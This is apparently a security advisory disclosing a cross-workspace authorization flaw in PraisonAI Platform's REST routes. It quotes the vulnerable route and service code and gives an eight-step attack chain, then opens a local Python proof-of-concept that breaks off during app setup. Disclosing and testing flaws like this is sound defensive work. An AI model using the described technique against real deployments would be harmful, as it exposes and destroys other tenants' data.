PraisonAI Platform workspace-scoped routes allow cross-workspace object access by global object ID
漏洞描述
### Summary PraisonAI Platform's workspace-scoped REST routes contain a systemic object-level authorization flaw that allows an authenticated user from one workspace to access, modify, and delete objects belonging to another workspace by supplying the victim object's global UUID. The affected pattern appears in workspace-scoped routes such as agents, projects, issues, and comments. The route layer verifies that the caller is a member of the `workspace_id` provided in the URL, but the service layer later resolves the target object by global object ID only. It does not verify that the resolved object actually belongs to the workspace in the URL. As a result, a valid member of `workspace_attacker` can call a route under: ```text /api/v1/workspaces/{workspace_attacker}/... ``` while supplying an object UUID from `workspace_victim`. The server authorizes the request based on membership in `workspace_attacker`, then fetches or mutates the victim object by global UUID. This breaks the platform's workspace isolation boundary. ### Details The root cause is that workspace membership authorization and object ownership validation are not bound together. The workspace dependency validates only that the caller is a member of the workspace named in the URL: ```python # praisonai_platform/api/deps.py async def require_workspace_member( workspace_id: str, user: AuthIdentity = Depends(get_current_user), session: AsyncSession = Depends(get_db), min_role: str = "member", ) -> AuthIdentity: member_svc = MemberService(session) has = await member_svc.has_role(workspace_id, user.id, min_role) ``` This confirms that the caller has access to the URL workspace. However, it does not prove that the target object belongs to that workspace. For example, the agent routes are scoped under a workspace path, but object access is performed using only the raw `agent_id`: ```python # praisonai_platform/api/routes/agents.py @router.get("/{agent_id}", response_model=AgentResponse) async def get_agent(workspace_id: str, agent_id: str, ...): agent = await svc.get(agent_id) return AgentResponse.model_validate(agent) ``` The service method resolves the agent by global UUID only: ```python # praisonai_platform/services/agent_service.py async def get(self, agent_id: str) -> Optional[Agent]: return await self._session.get(Agent, agent_id) ``` The same pattern is used for update and delete operations: ```python # praisonai_platform/api/routes/agents.py agent = await svc.update(agent_id, ...) deleted = await svc.delete(agent_id) ``` ```python # praisonai_platform/services/agent_service.py agent = await self.get(agent_id) ... await self._session.delete(agent) ``` There is no check equivalent to: ```python agent.workspace_id == workspace_id ``` Therefore, if an attacker is a valid member of any workspace, they can pass their own workspace ID in the URL while supplying an object ID from another workspace. The same architectural pattern appears in other workspace-scoped object routes, including projects, issues, and comments: ```python # praisonai_platform/api/routes/projects.py project = await svc.get(project_id) project = await svc.update(project_id, ...) deleted = await svc.delete(project_id) ``` ```python # praisonai_platform/services/project_service.py return await self._session.get(Project, project_id) ``` ```python # praisonai_platform/api/routes/issues.py issue = await svc.get(issue_id) issue = await svc.update(issue_id, ...) deleted = await svc.delete(issue_id) comments = await svc.list_for_issue(issue_id) ``` ```python # praisonai_platform/services/issue_service.py return await self._session.get(Issue, issue_id) ``` ```python # praisonai_platform/services/comment_service.py select(Comment).where(Comment.issue_id == issue_id) ``` This indicates a systemic object-level access control issue: routes are workspace-scoped, but service-layer object lookups are not workspace-bound. ### PoC The following local PoC creates a real PraisonAI Platform FastAPI app backed by an in-memory SQLite database, then uses only HTTP requests against the real API routes. The PoC demonstrates the following chain: 1. An attacker account creates `workspace_attacker`. 2. A victim account creates `workspace_victim`. 3. The victim creates an agent in `workspace_victim`. 4. The attacker sends: ```text GET /api/v1/workspaces/{workspace_attacker}/agents/{victim_agent_id} ``` 5. The server returns the victim agent from `workspace_victim`. 6. The attacker updates the victim agent through the attacker workspace path. 7. The victim observes the attacker-controlled modification. 8. The attacker deletes the victim agent through the attacker workspace path. Run with: ```bash PRAISONAI_REPO=/path/to/PraisonAI python -B embedded_poc.py ``` Full PoC: ```python #!/usr/bin/env python3 from __future__ import annotations import asyncio import os import sys import types import uuid from pathlib import Path from httpx import ASGITransport, AsyncClient from sqlalchemy.ext.asyncio import create_async_engine REPO_ROOT = Path(os.environ.get("PRAISONAI_REPO", "/path/to/PraisonAI")).resolve() PLATFORM_ROOT = REPO_ROOT / "src" / "praisonai-platform" AGENTS_ROOT = REPO_ROOT / "src" / "praisonai-agents" def verify_source() -> None: expected = { PLATFORM_ROOT / "praisonai_platform/api/deps.py": [ 'min_role: str = "member"', "member_svc.has_role(workspace_id, user.id, min_role)", ], PLATFORM_ROOT / "praisonai_platform/api/routes/agents.py": [ '@router.get("/{agent_id}", response_model=AgentResponse)', "agent = await svc.get(agent_id)", '@router.patch("/{agent_id}", response_model=AgentResponse)', "agent = await svc.update(", '@router.delete("/{agent_id}", status_code=status.HTTP_204_NO_CONTENT)', "deleted = await svc.delete(agent_id)", ], PLATFORM_ROOT / "praisonai_platform/services/agent_service.py": [ "return await self._session.get(Agent, agent_id)", "agent = await self.get(agent_id)", "await self._session.delete(agent)", ], } for path, needles in expected.items(): if not path.exists(): raise RuntimeError(f"source verification failed: file not found: {path}") text = path.read_text(encoding="utf-8") for needle in needles: if needle not in text: raise RuntimeError(f"source verification failed: {needle!r} not found in {path}") async def main() -> int: verify_source() sys.path.insert(0, str(PLATFORM_ROOT)) sys.path.insert(0, str(AGENTS_ROOT)) if "passlib" not in sys.modules: passlib_pkg = types.ModuleType("passlib") passlib_pkg.__path__ = [] sys.modules["passlib"] = passlib_pkg if "passlib.context" not in sys.modules: passlib_context = types.ModuleType("passlib.context") class _CryptContext: def __init__(self, *args, **kwargs): pass def hash(self, password: str) -> str: return f"stub::{password}" def verify(self, password: str, hashed: str) -> bool: return hashed == f"stub::{password}" passlib_context.CryptContext = _CryptContext sys.modules["passlib.context"] = passlib_context os.environ["PLATFORM_JWT_SECRET"] = "test-secret-for-testing-only" from praisonai_platform.api.app import create_app from praisonai_platform.db.base import Base, reset_engine from praisonai_platform.db import base as base_mod await reset_engine() engine = create_async_engine( "sqlite+aiosqlite:///:memory:", echo=False, connect_args={"check_same_thread": False}, ) base_mod._engine = engine base_mod._session_factory = None async with engine.begin() as conn: await conn.run_sync(Base.metadata.create_all)